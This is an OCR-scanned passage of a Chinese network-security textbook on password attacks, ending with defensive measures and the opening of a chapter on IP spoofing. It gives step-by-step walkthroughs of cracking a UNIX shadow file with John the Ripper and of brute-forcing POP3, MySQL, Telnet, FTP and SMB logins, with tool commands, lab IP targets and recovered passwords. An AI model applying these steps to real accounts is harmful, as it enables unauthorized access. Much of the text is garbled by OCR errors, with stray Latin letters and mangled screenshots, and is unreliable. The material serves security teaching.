(3) 设置 缓冲 区 、 抓 取 长 度 、 取 样 时 间 和 等。 缓冲 区 是 存放 从 内 核 缓 冲 区 复制 的 网 络 包 ， 
需 设置 其 大 小 ; 取样 时 间 意 思 为 奇 内 核 缓 冲 区 有 数据 待 读 但 还 未 满 , 系 统 等 待 多 长 时 间 问 
HP tf XU WEST BUB s 右 取 样 时 间 为 零 , 那 么 一 有 数据 ,系统 就 立刻 发 送 “ 就 绪 ?” 通 
知 , 由 用 户 进 程 把 数据 从 内 核 绥 冲 区 复制 到 用 户 缓 冲 区 。 不 过 这 样 可 能 会 造成 太 过 频繁 的 
通知 和 复制 ,增加 系统 处 理 能 力 的 负担 ,降低 效率 。 如 果 适 当 设 置 取 样 时 间 ,在 系统 等 行 发 
送 “ 就 绪 ” 通 知 时 ,就 可 能 有 新 的 数据 到 来 ,那么 多 个 网 络 包 只 需 进 行 一 次 通知 和 复制 ,减少 
了 了 系统 处 理 能 力 的 额外 消耗 。 抓 取 长 度 定义 了 从 内 核 复制 空间 到 用 户 空 间 的 最 大 的 网 络 包 
长 ,超过 该 长 度 的 包 会 被 截 短 ,也 是 为 了 提高 处 理 效率 。 

(4) 设置 过 滤 磊 。 过 滤 兹 使 内 核 只 抽取 那些 感 兴趣 的 网 络 包 ,而 不 是 所 有 流 过 网 络 介 
质 的 网 络 包 ,以 减少 不 必要 的 复制 和 人 处理。 

(5) 读 取 包 。 从 文件 摘 述 符 中 读 取 数据 ,一 般 情况 下 ,就 是 数据 链 路 层 的 帆 , 也 就 是 以 
AX P that 。 

(6) 过 沽 .分析 AEE Fao. A A KR He ae De. RE AO ia A. PEZ 2 I8] RE 
制 到 用 户 空间 ,然后 由 用 户 进 程 分 析 过 滤 , 主 要 分 析 以 太 包 涉及 TCP/IP 包头 的 信息 ,如 源 
IP、 目 的 IP 数据 长 度 、 协 议 类 型 (UDP、TCP、ICMP) , 源 端 口 、 目 的 端口 等 ,从 中 选择 用 户 感 
兴趣 的 网 络 数据 包 。 之 后 对 应 用 层 协议 级 的 数据 进行 解释 ,把 原始 数据 转化 为 用 户 可 理解 
的 方式 输出 。 


各 类 捕获 网 络 数据 包 的 方法 在 嗅 探 珍 中 用 不 同 拉 术 实现 。 
网 络 唱 探 工具 有 许多 ,和 常见 的 网 络 唱 探 工 具 如 表 6-3 所 示 。 


表 6-3 常见 的 网 络 嗅 探 工 具 


Kd 28 DEL TR di PA 网 络 下 载 地 址 
tcpdump http://www. tcpdump. org 
sniffit http: //reptile. rug. ac. be/ ~ coder/sniffit/sniffit. html 
snort http://www. snort, org 
Analyzer http: //analyzer. polito. it/ 
Ethereal http://www. ethereal. com/ 
dsniff http: //naughty. monkey. org/ ~ dugsong/ dsniff 


6.2 UNIX 系统 口令 攻击 


1. UNIX 系统 口令 安全 分 析 

UNIX 系统 用 户 的 口令 保存 在 一 个 加 密 后 的 文本 文件 中 ,一般 存放 在 /etc 目录 下 ,文件 
名 为 passwd 或 shadow. HAI. UNIX 系统 出 于 安全 需要 ,防止 普通 用 户 读 取 口 令 文件 ,将 
passwd 文件 信息 分 成 两 个 文件 来 存放 ,与 用 户口 令 相 关 的 域 提取 出 来 组 成 另外 一 个 文件 ， 
PRAY shadow ,并 规定 只 有 超级 用 户 才 能 读 取 。shadow 文件 内 容 如 下 。 


root: $ 1 $ ImTXqnbk $ tht9sYPq.9dYoEjKo6.Kk1:11588:0:99999:7: — 1: —1:134540356 
bin: * :11588:0:99999:7::: 

daemon: * :11588:0:99999:7::: 

adm: * :11588:0:99999:7::: 

lp: * :11588:0:99999:7::: 


passwd 文件 只 保存 用 户 基本 信息 。passwd 文件 内 容 如 下 。 


root:x:0:0:root: /root: /bin/bash 
bin:x:1:1:bin:/bin: 
daemon:x:2:2:daemon: /sbin: 
adm:x:3:4:adm:/var/adm: 
lp:x:4:7:lp:/var/spool/l1pd: 
sync:x:5:0:sync:/sbin: /bin/sync 


目前 ,多 数 的 UNIX 系统 中 ,口令 文件 都 作 了 shadow 变换 , 即 把 /etc/passwd 文件 中 的 
口令 域 分 离 出 来 ,单独 存放 在 /etc/shadow 文件 中 ,并 加 强 对 shadow 的 保护 ,以 增强 口令 文 
件 的 安全 性 。 同 时 ,UNIX 口令 文件 的 保存 不 是 明文 ,而 是 经 过 加 密 变 换 后 存放 的 。 

HER UNIX 系统 用 户口 令 灯 用 了 安全 保护 机 制 ,但 是 仍然 面临 以 下 几 种 威胁 。 

(1) HP Telnet 远程 登录 到 UNIX 系统 会 遭 到 监听 。 
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(2) UNIX 系统 软件 漏洞 导致 普通 用 户 可 以 谱 取 口令 文件 shadow. 

(3) FAP Xe BE B fa] ER. LT ,容易 受到 猜测 攻击 或 又 力 攻 击 。 

2. 破解 工具 原理 分 析 

Crack 是 一 个 口令 破解 工具 ,其 主要 工作 流程 如 下 。 

第 一 步 , 下 载 或 自己 生成 一 个 字典 文件 。 

第 二 步 ,取出 字典 中 的 每 一 个 条 目 ,对 每 个 单词 运用 一 系列 的 规则 。 规 则 可 以 多 样 , 典 
型 的 规则 有 : 使 用 几 个 单词 和 数字 的 组 合 ; 大 小 与 交 蔡 使 用 ; 把 单词 正 有 反问 拼写 后 ,拼接 在 

起; 每 个 单词 的 开 涉 结尾 加 数字 。 当 然 , 使 用 规则 越 多 , 破 详 所 宕 时 间 越 长 ,但 破 详 成 功 

可 能 性 越 大 。 

第 四 步 ,用 一 组 子 程序 打开 口令 文件 ,取出 其 中 的 密 文 口令 ,与 系统 erypt O RA dy h 

循环 重复 第 二 步 和 第 三 步 , 直 至 口令 破解 成 功 。 

3. UNIX 系统 口令 破解 实例 

假定 攻击 者 煞 取 了 UNIX 系统 的 passwd 文件 和 shadow 文件 。 这 里 以 John the 
Ripper 密 fid 破解 An 为 例 说 明 破解 工具 的 使 JH. John the Ripper 是 用 a E Al 密 文 情 UL 
用 来 破解 明文 的 密码 破解 软件 。 使 用 John the Ripper 破解 UNIX F shadows 的 过 程 
如 下 。 

第 一 步 ,在 命令 行 方式 下 输入 “john”, 可 显示 它 的 使 用 方法 ,如 图 6-2 所 示 。 


PD: \crack*sSjohn-16 \eun?>john 


John the Ripper Version 1.6 Copyright Cc) 1796-98 by Solar Designer 





| eee “single crack" mode 
—wordfile=:FILE -stdin wordlist mode, read words from FILE or stdin 
-rules enable rules for wordlist mode 





—incrementaLll :MODE] incremental mode Lusing section MODE] 
| external mode or word filter 
-stdout [: LENGTH 1 no cracking, just write words to stdout 


—restore[:=FILE] restore an interrupted session [from FILE] 
—seszion-:FILE set session file name to FILE 

—status[:FILE] print status of a session [from FILE] 
—nakechars - FILE make a charset. FILE will be overwritten 
-show show cracked passwords 

-test perform a benchmark 

—users:[-]LOGINIUIDE,.. load this Cthese> user¢s) only 

-groups : [-—I1GIDL,...1 load users of this ‘these)> groups) only 

| She lls:C—IJSHELL[,..] load users with this these) shell¢s> only 
-salts :[-ICOUNT load salts with at least COUNT passwords only 
ne force ciphertext format MAME <DES/BSDI /“MDS/BF/AFS/LMD> 
—savemem: LEVEL enable memory saving. at LEVEL 1..3 











[D=\crack\john-16 \run>john passwd 





图 6-2 john 软件 的 帮助 信息 


种 二 步 , 执 行 john. exe password. Ist shadow 命令 ,开始 破解 ,如 图 6-3 所 示 。 
在 图 6-3 中 可 以 看 到 ,已 经 破解 了 5 个 用 户 (alias cvs、root jiang 和 spring) 的 口令 ,这 
些 用 户口 令 分 别 为 alias .cvs、aq4shit 和 welcome, 如 图 6-4 Bra. 
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tmp johncrack*john-i1é*nrun».*john.exe password.15 adow 
ed 14 passwords ith EU different salts (FreeBs D “mos ^132/22]) 


(spring) 








图 6-3 





‘= MS ET 方式 
>, ohn. exe -Show shadow 
ii- -] 345 1356 


j/S:0cww5:11 
ali as: Alias 5118 


5 passwords cracked, 3 


E:tmp*s johncracks john-16\run> 





图 6-4 john 破解 口令 信息 
6.3 口令 攻击 条 例 


1. 邮箱 破解 口令 

Email Crack 是 一 个 基于 POP3 协议 的 口令 破解 软件 , 它 根据 攻击 者 提供 的 用 户 名 单 和 
口令 列表 文件 ,日 动 乏 个 尝试 猜测 用 户口 令 。 该 软件 设计 简洁 ,使 用 简单 。 启 动 Email 
Crack 软件 ,出现 Email Crack 主 界面 ,如 图 6-5 Ara. 

下 面 和 测 单 说 明 Email Crack 主 界 面 的 各 项 参数 配置 。 

(1) Server 项 配置 : 在 Server 框 中 应 填写 准备 要 攻击 的 邮件 服务 网 址 ,一 般 来 说 就 是 
POP3 服务 器 的 地 址 ,IP 地 址 和 域名 地 址 都 可 以 ,但 为 了 加 快速 度 , 建 议 填写 IP 地 址 。 如 果 
不 知道 IP 地 址 ,可 查询 域名 服务 需 解 析 , 即 可 获得 主机 的 IP 地 址 。 

(2) User list file 项 配置 : 在 “User list file” 栏 填写 用 户 列表 文件 的 名 称 , 需 要 注意 的 是 
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图 6-5 Email Crack 主 界面 


用 户 列表 文件 的 格式 是 普通 的 文本 文件 ,要 求 一 行 一 个 用 户 。 

(3) Password list file 项 配置 . 在 Password list file 栏 填写 准备 尝试 的 口令 文件 列表 ， 

(4) Try user name 项 配置 : 尝试 使 用 用 户 名 作为 口令 。 如 果 选 定 此 项 ,程序 在 测试 中 
会 日 动用 用 户 的 账号 作为 口令 进行 试验 。 如 来 不 想 试验 用 户 名 ,可 以 关闭 此 选项 ,在 试验 过 
程 中 减少 一 次 登录 试验 , 记 省 时 间 。 

(5) Thread Number 项 配置 : 选择 程序 的 同时 打开 线程 数目 ,一 般 对 于 拨号 上 网 用 户 ， 
建议 设 定 为 20 一 30 个 ,但 也 有 使 用 60 个 线程 的 先例 ,使 用 者 可 以 自行 决定 。 

下 面 举 一 个 实际 应 用 中 电子 邮件 口令 破解 的 例子 ,如 图 6-6 BAN 


k 





图 6-6 电子 邮件 口令 破解 示意 图 
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程序 运行 后 会 自动 使 用 口令 列表 文件 ,测试 每 一 个 用 户 账号 的 口令 。 如 果 成 功 ,自动 记 
录 在 result. txt 文件 中 。 在 图 6-6 中 可 以 看 到 ,用 户 jianchun 的 口令 已 被 破解 ,口令 记录 在 
Email Crack 所 在 目录 的 一 个 名 为 result. txt 的 文件 中 。 打 开 这 个 文件 ,可 看 到 用 户 
jianchun 的 口令 为 1028ilp, 如 图 6-7 所 示 。 


Miresult.txt - 记事 本 


jianchun: 1828i1p| 


图 6-7 电子 邮件 口令 破解 结果 





2. 网 上 口令 嗅 探 

Dsniff 是 Dug Song 开发 的 网 络 监 听 软 件 包 ,专门 帘 获 口令 软件 ,网 上 下 载 地 址 为 
http://naughty. monkey. org/~ dugsong/dsniff 或 http://packetstormsecurity. org/ 
sniffers/dsniff/ , 

该 软件 能 够 在 广播 共享 或 交换 的 网 络 环境 监听 FTP, Telnet, HTTP, POP, IMAP, 
SNMP, LDAP 等 多 种 网 络 应 用 服务 传送 的 信息 。Dsniff 既 文 持 OpenBSD, Linux, Solaris 
等 UNIX 系统 ,又 文 持 Windows 系统 。 

如 图 6-8 所 示 ,用 Dsniff 监听 口令 特别 容易 ,只 要 在 命令 行 下 执行 dsniff BIA, 


[root@monitor-lab dsniff-2.2]./dsniff 
dsniff: listening on eth 


1939 -> 202.106.187.150.118 (pop) 


03 09:38:34 tcp dace d 1037 -> 166.111.8.238.118 (pop) 





图 6-8 Dsniff 监听 口令 示意 图 


3. MySOL 口令 破解 

mysql pwd crack 运行 在 Windows 平台 下 的 MySQL 数据库 密 码 破 解 程序 ,如 图 6-9 
所 示 。 该 破解 程序 提供 3 种 模式 对 MySQL 数据 库 密 码 进行 猜测 。 

4. Telnet 口令 破解 

Brutes 是 一 个 还 程 口令 人 破解 工具 , 文 持 Windows 系列 操作 系统 , 文 持 下 面 儿 种 类 型 口 
令 破 解 : 基本 的 HTTP 认证 的 HTTP, 基 于 HTML 形式 HTTP, POP3, FTP, SMB, 
Telnet。 
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= 





ex C: \FIHDOTS\ system? iced. exe 


D: \nysql_pwd_crack>mysql]_pwd_crack 
mysql password crack v 1.8 
zhouzhen@gmail.com http://zhouzhen.eviloctal.org 


usage =: mysql_pwd_crack Lip] [options ] 
options: 


username specify the username of mysql 
| port the port of mysql 
-p password specify the password of mysql 
-ü dict specify the dictionary 
-a automode automatic crack the mysql password 
Note: when u use the -a option, named the username dict user.dic 
password dict pass.dic 
example: mysql_pwd_crack 127.0.0.1 -x 3366 -u root -d passdict.txt 
nysql pwd_crack 127.0.0.1 -x 3386 -p root -d userdict.txt 
musql pud, crack 127.0.0.1 -x 3306 -a 


D:`mysgl_puyd_crack> 





6-9 mysql pwd crack 运行 示意 图 


可 以 从 http://www. hoobie. net/brutus/index. html 网 站 下 载 Brutus. € WY Z 2 fn] A, 
H sis dU Hk AR XC UE fee Os AB $138 xe HJ B xe BI nf. xx BEAR $$ A n] 3417 X £F. Brutus. exe, lit 
Brutus. exe 程序 ,出 现 该 程序 的 主 界 面 , 如 图 6-10 Prom. 






X Brutus - AET2 - www. hoobie. net/brutus - (January 2000) 


= File Tools Help 


Stop 
| Port |80 Connections s — 10 Timeout A — 10 [ Use Proxy Wain) 

















Method [HEAD =| [v KeepAlive 
Authentication Options 
[v Use Username [ Single User Pass Mode [ord List = 





User File [users.tt Browse| Pass File [wvords. tet Browse | 


Positive Authentication Results 


OO 








6-10 Brutus 程序 主 界面 


下 面 举例 说 明 Brutus 猜测 192. 168.0. 78 主机 的 root HS., 

第 一 步 , 在 Target 文本 框 中 输入 “192.168.0.78”, 在 Type 下 拉 杠 中 选择 “Telnet”。 

第 二 步 ,在 Connection Options 栏 的 Port 数字 框 中 输 人 “23”,Connections 及 Timeout 
保持 默认 值 。 如 果 用 代理 服务 冀 选 中 “Use Proxy” 复 选 框 并 单 击 Define 按钮 设置 代理 服务 
古 。 此 处 没有 应 用 代理 服务 天 。 
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第 三 步 , 单 击 Start 按钮 开始 破解 流程 。 如 图 6-11 所 示 , 状 态 显 示 窗 口 说 明 root 口令 
12qwaszx 已 锌 破解 。 


X Brutus 一 AET2 - www. hoobie. net/brutus 一 dlc x! 
File Tools Help 


Target [192168.0.78 Type | Telnet +] | Stat | stop | Clear| 


—Connection ad 


10 — [ UseProw Define 


Telnet Option 
Modity sequence | [ Try to stay connected for [unimie + | attempts 


Authentication Option 
J¥ Use Usemame [^4 Single User Pass Mode [word List =| 


UserlD froot Browse] Pass File JE:\tmp\telnetcrack p. ts Browse | 


Positive Authentication Results 


| ication at _fo with User: root Pass 
Disengaged target 192.168.0. 78 ela sed time : 0:00:01 attempts : 


Mmeo REE Auth eeg haie mince ki 


W:root F:12qwazzx (i Attempts per second Idle 到 
6-11 应 用 Brutus 破解 口令 示意 图 





注意 : 此 处 ,Telnet Options, Authentication 设置 保持 默认 值 不 变 。 读 者 可 以 根据 自己 
的 实际 情况 设置 。 
5. FTP 口令 破解 
FTP-C 是 一 个 专门 破解 FTP 口令 的 工具 ,从 界面 到 操作 都 十 分 简单 。 软 件 很 小 ,只 有 
200KB, € 以 压缩 方式 发 布 ,可 以 设置 代理 破解 口令 ,因此 可 以 隐蔽 攻击 者 的 行踪 。 
dC FTP-C 时 ,只 震 把 讨 缩 文件 解压 缩 到 指定 的 目录 即 可 ,最 后 获得 可 执行 文件 
FTPC. exe。 双 击 FTPC. exe 程序 ,出 现 该 程序 的 主 界面 ,如 图 6-12 Bra. 










User Mamie List: Eu C 


dvs 
sgosdgsd 
Igsdg 
gdsgs 
ganu 


, User C:\Documents and Settings \Administrator\ 2 E (BU Tm 
"Password Fite Name: C:\Documents and Settings Administrator, i\pas| | 





Status: [Bees p iD AR 


Results: AM 


User -> qxnu Password -> [111 


"F2 





图 6-12 FTP-C 程序 主 界面 
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下 面 举 一 个 猜测 192. 168. 0. 92 主机 的 FTP 用 户口 令 的 例子 。 
第 一 步 ,输入 目标 主机 参数 ,如 图 6-13 Bra. 


Version 1.2 @ 


Poe 
1 P od. 
Jser Name List: x Passwords List: 
err : €— 









FIP-L Lonfiguration.. 





IP ; Host Mame: |132.158.0.32 
Us Use Prow | 0 | 
st | 


Re To use proxy follow the example -> http://192.31.174.2:80 


















Configuration 


€ - E i á i 





图 6-13 FTP-C 目标 主机 参数 输入 


第 二 步 ,选择 用 户 文 件 及 口令 文件 ,如 图 6-14 Bron, 


. User Name File: E-\tmp\ftpcrack \user.txt 









Rr 


|. Password File Name: E-\tmp\ftpcrack\password. txt ‘Choose: 


ac 
1334 
42 e - 
ver E a 
Ji = ecen tette eM 


Attack. | Configuration 


6-14 选 定 FTP-C 攻击 文件 


种 三 步 , 配 置 好 参数 后 , 单 击 Attack 按钮 开始 破解 。 在 主 界面 的 Result HAW Al, 
已 破解 出 用 户 root 的 口令 为 aq4shit, 如 图 6-15 所 示 。 

6. SMB 口令 破解 

十 程 攻击 Windows 系统 的 方法 之 一 是 猜测 SMB 口令 。NAT (NetBIOS Auditing 
Tool) SMB 口令 破解 工具 ,可 从 www. securityfocus. com 网 站 下 载 。NAT 以 压缩 文件 
的 形式 发 布 ,安装 简单 ,把 它 解 压缩 到 指定 的 目录 即 可 ,执行 程序 文件 名 为 nat exe, NAT 
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PTE 


Uzser Hame List: 
fe ETC 

root 

Iranhun 








User Hame File: E-\tmp\ftpcrack \user_txt | ll Choose 


Password File Mame: (SAUT IIR E TS STIR D ER EN 





Status: (MEEA Ue o M 
Results: 


User -> root Password -> ILE 


= 
=f 


Al6-15 FTP-C 口令 破解 结果 
的 用 法 形式 如 下 : 


nat —o [filename] -u [userlist] -p[passlist] «address > 


其 中 ,-o: 指定 保存 nat 检测 结果 的 文件 。 

-u: 指定 要 破解 的 用 户 账号 名 文件 ,该 文件 属于 文本 文件 格式 。 

-p: 指定 口令 字典 文件 ,该 文件 属于 文本 文件 格式 。 

< address»; HIP 地 址 。 

下 面 举例 说 明 ,运行 nat 对 192. 168. 0. 250 主机 进行 SMB 口令 猜测 ,如 图 6-16 ray. 


‘ GSES E E - ni x1| 


| m = 
E:\jianchunnatiðbin?>nat -u userlist.txt -p passlist.txt 192.168.090.250 | 
[x]——— Reading usernames from userlist .txt 
[x]——- Reading passwords from passlist.txt 












Mr«]——— Checking host: 192.168.8.258 


qL*1——- Obtaining List of remote NetBIOS names 1 
"TES EE Remote systems name tables: 


WENWETPI-AKGCP1 
WENWETPI-AKCCP1 
WORKGROUP 
WENWEI PI-AKCCP1 
WORKGROUP 

[Net “Services 
IS“NWEIPI-AKCCP 


[x]——— Attempting to connect with name: * 
[¥]——— Unable to connect 


[*x]——— Attempting to connect with name: WENWEIPI-AKCCPI 

[ 关 ] 一 一 一 CONNECTED with name: VENUEIPI -AKCCP1 

[x]——— Attempting to connect with protocol: MICROSOFT NETWORKS 1.83 
[ 关 ] 一 一 一 Server time is Mon Jun 38 18:58:36 2683 

Cx]——— Timezone is UTC+8.@ 





6-16 NAT 口令 破解 结果 
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7. 文档 密码 破解 

Office 文档 是 当今 社会 人 们 使 用 最 普 让 的 电子 文档 格式 ,但 是 人 们 时 常会 遇 到 文档 密 
PSA eid BR Se H F Word/Excel 的 加 密 方式 很 复杂 ,用 户 输 入 的 口令 的 hash 值 ， 
并 不 保存 于 Word 文档 中 ,并 且 加 密 过 程 引 入 了 一 个 16 字 节 的 随机 字符 ,这 使 得 每 一 次 加 
密 同一 口令 ,其 Hash 值 都 不 一 样 。 因 此 ,一 般 情 况 下 ,文档 无 法 打开 使 用 ,只 好 借助 暴力 口 
令 猜 测 工具 来 破解 文档 密码 ,可 是 当 文 档 的 密码 设置 在 7 位 以 上 时 ,就 需要 很 长 时 间 及 大 量 
的 计算 资源 。 

下 面 介 绍 国内 逆 回 逻辑 研究 小 组 (www. Cracklogic. org) 开 发 的 Madoc Decryptor 文档 
密码 快速 恢复 工具 。Madoc Decryptor 巧妙 地 避免 了 其 他 破译 方式 存在 的 缺陷 ,并 运用 “并 
行 时 空 平 衡 算 法 ”等 多 种 算法 对 Word/Excel 等 加 密 文 档 进行 快速 破译 。 时 空 平衡 算法 是 
H pE HY Philippe Oechslin 教授 在 90 年 代 中 期 基于 前 人 的 基础 上 提出 ,并 进行 了 改进 。 最 
早 提出 类 似 的 理论 是 在 80 年 代 初 期 。 这 种 算法 的 特点 是 引入 了 一 个 纺 减 图 数 的 概念 ,缩减 
函数 把 随机 明文 A 经 过 x 算法 产生 的 喻 希 值 与 明文 A 十 1 巧妙 的 结合 在 一 起 ,以 此 类 推 , 结 
合成 一 个 关于 明文 的 链 。 而 在 此 算法 的 数据 表 文 件 中 只 保留 一 个 数值 链 的 首 市 点 和 末 市 
点 ,从 而 大 大 减少 了 数据 表 , 可 以 看 成 是 字典 文件 所 占用 的 存储 空间 。 

在 破译 时 ,通过 数据 表 中 某 条 链 的 尾 节 点 ,就 可 以 按 规律 迅速 生成 并 比较 其 中 的 所 有 他 
点 ,如 这 条 链 中 的 某 个 节点 即 Hash 值 和 要 比 对 的 Hash 匹配 , 则 很 快 就 能 推出 这 个 节点 即 
Hash 值 所 对 应 的 明文 。 此 算法 最 大 的 优势 就 是 把 破译 时 所 需要 的 巨大 的 存储 空间 ,转化 
为 较 小 的 存储 空间 和 一 定量 的 处 理 天 开销 。 这 个 算法 吸收 了 又 力 破 解 的 优点 ,把 所 有 可 能 
的 数值 经 预先 计算 保存 在 文件 中 ,同时 又 在 很 大 程度 上 避免 了 又 力 破 解 的 缺点 , 即 数值 空间 
集合 将 占用 极其 巨大 的 存储 空间 。 

Madoc Decryptor 在 实际 测试 中 ,一 个 Excel 或 Word 文档 平均 5 分钟 即 可 被 破译 。 
Madoc Decryptor 使 用 步骤 示意 图 如 图 6-17 所 示 ,打开 程序 ,选择 要 破译 的 文件 。 


| 5: Mad Word Decryptor 个 人 版 (1 cpu) verl.0 
bn | 





图 6-17 密码 破 详 成 功 


6.4 口令 攻击 防范 拉 术 与 方法 


1. 增强 口令 用 万 安全 意识 

口令 是 当前 网 络 服务 进行 身份 鉴别 的 重要 依据 ,因此 口令 选择 尤为 重要 ,一 般 遭 守 以 下 
原则 ， 

d) 口令 选择 应 至 少 8 个 字符 ,选用 大 小 写字 母 .数字 特殊 字符 的 组 合 , 禁 止 使 用 与 账 
号 相同 或 相似 的 口令 。 

(2) 限制 连续 账号 登录 失败 的 次 数 , 建 议 为 3 次 。 

(3) 禁止 共享 账号 和 口令 。 

(4) 口令 文件 应 加 密 存 放 , 并 只 有 超级 用 户 才 能 读 取 。 

(5) 荣 止 明文 形式 在 网 络 上 传递 口令 。 

(6) 口令 应 有 时 效 机 制 ,必须 定期 更 改 ,并 且 茶 止 重用 旧 的 口令 。 

(7) 对 所 有 的 账号 运行 口令 破解 工具 ,以 寻找 虹口 令 或 没有 口令 的 账号 。 

(8) 必须 更 换 系 统 默认 口令 ,避免 使 用 默认 口令 。 

用 户 在 设 定 口令 后 ,可 以 访问 http://www. webdon. com/pswealc. asp 计算 一 下 目 己 
的 口令 安全 强度 ,看 看 黑客 大 致 花 多 少时 间 可 以 破解 目 己 的 口令 。 

2. 口令 安全 增强 策略 设置 

口令 攻击 是 稼 见 的 攻击 方法 ,攻击 成 功 与 否 取 决 于 多 种 因素 ,包括 口令 长 度 . 口令 有 效 
期 ,口令 加 密 算 法 ,口令 系统 安全 机 制 等 。 增 强 口 令 安 全 性 有 以 下 几 种 方法 。 

d) 口令 存放 以 密 文 形式 存放 ,防止 黑客 耳 接 读 取 明文 。 

(2) 系统 设置 弱 口 令 过 滤 机 制 , 如 口令 长 度 限 制 . 口 令 复 杂 性 设置 等 ,在 用 户 选择 口令 
时 ,系统 强制 用 户 选 择 好 的 口令 ,同时 过 滤 掉 屁 口 令 。 

(3) 设置 用 户口 令 输入 出 错 次 数 , 当 用 户口 令 输 入 错误 次 数 超过 某 个 阅 值 时 ,就 限制 用 
户 登 录 。 

CA) 替换 高 风险 的 网 络 服务 ,如 将 Telnet, FTP 服务 改 为 SSH 服务 。 

3. 口令 认证 机 制 安 全 增强 

传统 的 口令 认证 机 制 是 明文 传递 ,而 且 攻 击 者 可 以 用 程序 自动 攻击 ,针对 口令 认证 机 制 
的 弱点 ,可 以 采取 以 下 安全 措施 来 增强 口令 认证 的 安全 。 

(1) 采用 S/Key 一 次 性 口令 机 制 HHS, S/Key 可 以 你 证 用 户 发 送 给 服务 天 
的 口令 不 重复 ,而且 这 些 口 令 在 计算 上 是 相关 的 。 即 使 攻击 者 禄 听 到 某 个 口令 ,但 是 这 个 口 
令 以 后 不 再 重用 ,因此 ,就 可 以 成 功 地 抵抗 口令 禄 听 。 

(2) 采用 双 因 于 认证 。 当 需要 认证 用 户 身 份 的 时 候 , 不 仅 需 要 用 户 输入 口令 ,而 且 还 要 
用 户 拥 有 某 个 物理 实体 的 时 候 ( 如 智能 卡 、U 盘 ), 才 允许 用 户 访问 某 服务 或 资源 。 

(3) 当 对 用 户 进 行 认证 的 时 候 , 展 示 一 个 图 形 方 式 的 随机 数 给 用 户 ,要 求 用 户 不 仅 输 入 
口令 ,而 且 要 手工 输入 该 随机 数 。 由 于 攻击 者 的 程序 无 法 做 到 自动 解读 图 形 的 随机 数 , 因 此 
可 以 有 效 抵 制 攻击 者 恶意 破解 口令 ,如 图 6-18 Bra. 
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图 6-18 ”基于 验证 码 增 强 口 令 安 全 示意 图 


4. 防止 网 络 口令 嗅 探 器 


网 络 串 探 器 对 明文 传递 的 网 络 包 极 具 威胁 ,该 攻击 方法 成 功 实 施 需 要 一 定 的 条 件 , 如 安 
婆 咒 探 疾 的 权限 、 是 否 可 接近 物理 线路 等 。 网 络 咒 探 帮 适 用 于 内 部 攻击 ,因为 内 部 人 员 可 以 
方便 地 访问 网 络 。 针 对 网 络 串 探 器 攻击 特点 ,在 安全 措施 上 ,将 网 络 分 段 ,限制 共享 网 络 使 
用 。 同 时 ,将 在 网 上 传递 的 口令 信息 进行 加 密 。 此 外 ,应 用 主动 嗅 探 器 检查 工具 ,发 现 网 络 
EAE ORR HE AY FT BE DL AE. GA 6-19 所 示 。 
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图 6-19 ” 嗅 探 器 检查 示意 图 


5. 用 户口 令 管 理工 具 

用 户口 令 保 管 不 当 往 往 成 为 攻击 切入 点 ,针对 口令 管理 问题 ,研究 人 员 和 相关 组 织 开 发 
出 各 种 口令 安全 解决 方案 。 

d) 采用 单 点 登录 技术 SSO, 解 决 用 户口 令 记 忆 繁 多 的 问题 。 用 户 只 需要 登录 一 次 系 
统 , 就 可 以 访问 不 同系 统 资源 。 

(2) 口令 管理 。 国 际 上 一 些 公 司 也 开发 了 专门 的 工具 软件 ,用 来 保管 用 户 的 口令 。 例 
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图 6-20 Animabilis 的 口令 管理 软件 示意 图 
6.5 本 痘 小 结 


口令 攻击 是 网 络 信息 系统 的 典型 威胁 之 一 。 本 章 分 析 了 口令 攻击 总 体 情况 ,总结 了 口 
令 攻 击 的 共性 技术 方法 ,列举 了 UNIX, IUS FE. Telnet 服务 .邮件 等 各 种 口令 攻击 典型 实 
例 。 在 此 基础 上 ,给 出 口令 安全 防范 方法 和 技术 。 读 者 通过 了 解 口令 攻击 技术 的 内 少 , 可 以 
理解 各 种 口令 攻击 的 局 限 性 和 限制 条 件 , 人 然后 在 防范 口令 攻击 的 实战 中 灵活 运用 ,设计 有 效 
的 口令 安全 策略 ,建立 有 效 的 口令 安全 机 制 ,构造 可 靠 的 口令 安全 防护 体系 。 


习题 6 


1. 什么 是 口令 破解 ? 

2. 口令 认证 的 过 程 是 用 户 在 本 地 输入 账号 和 口令 ,经 传输 线路 到 达 远 端 系 统 进 行 认 
证 。 由 此 ,就 产生 了 3 种 口令 攻击 方式 ,是 哪 3 种 ? 

3. 口令 攻击 的 主要 方法 有 哪些 ? 

4. 防范 口令 攻击 的 方法 有 哪些 ? 

o. 请 实际 测试 几 种 口令 破解 工具 。 


第 7 章 欺骗 攻击 


7.1 IP 欺骗 攻击 


7.1.1 IP 欺骗 攻击 的 概念 


IP 地 址 是 由 互联 网 服务 提供 商 提 供 , 这 个 地 址 就 像 号 份 证 ,在 用 户 浏览 
网 站 ,以 及 发 送 一 些 信 息 的 时 候 , 通 过 这 个 地 址 可 以 确定 用 户 在 某 一 个 时 间 
段 的 具体 位 置 。 它 为 互联 网 上 的 每 一 个 网 络 和 每 一 台 主 机 分 配 一 个 欣 辑 地 
HE ,以 此 来 屏蔽 物理 地 址 的 差异 。 

每 个 IP 数据 包 都 记录 有 目的 节点 IP 地 址 和 源 节点 IP 地 址 。 由 于 未 对 
源 地 址 的 有 效 性 进行 检查 ,任何 人 都 可 以 指定 源 地 址 ,用 户 填 写 的 源 地 址 可 
以 和 自身 的 源 地 址 不 同 。 

IP 欺骗 就 是 通过 隐藏 用 户 IP 地 址 实现 的 。 实 现 方法 是 通过 创建 伪造 
IP 地 址 包 ,这样 在 发 送信 息 的 时 候 , 对 方 就 无 法 确定 发 送 者 的 真实 IP 地 址 ， 
IP EX Jj dE ZR ER ES ahd , 通 利和 被 垃圾 邮件 制造 着 和 黑客 用 来 误导 追踪 者 回溯 错误 
的 信息 来 源 处 。 

对 于 攻击 者 而 言 , 使 用 伪装 的 IP 地 址 包 会 导致 其 无 法 收 到 来 自 目 的 服 
务 需 的 啊 应 。 使 用 假冒 的 IP 地 址 输出 数据 包 , 导 致 假冒 的 IP 地 址 主机 接收 
来 和 月 目的 主机 的 啊 应 ,攻击 者 无 法 获得 啊 应 信息 。 因 此 攻击 者 在 使 用 IP HX 
骗 技 术 时 ,代表 不 在 乎 是 否 能 接收 到 目的 服务 器 的 响应 ,或 者 能 够 以 其 他 方 
式 收 到 啊 应 信息 。 在 拒绝 服务 攻击 中 ,攻击 者 无 有 顷 获 得 啊 应 。 在 进行 TCP 
会 话 劫持 时 ,攻击 者 可 以 通过 其 他 方式 获得 啊 应 数据 。 在 上 述 情 况 下 都 可 以 
使 用 IP 欺骗 。 


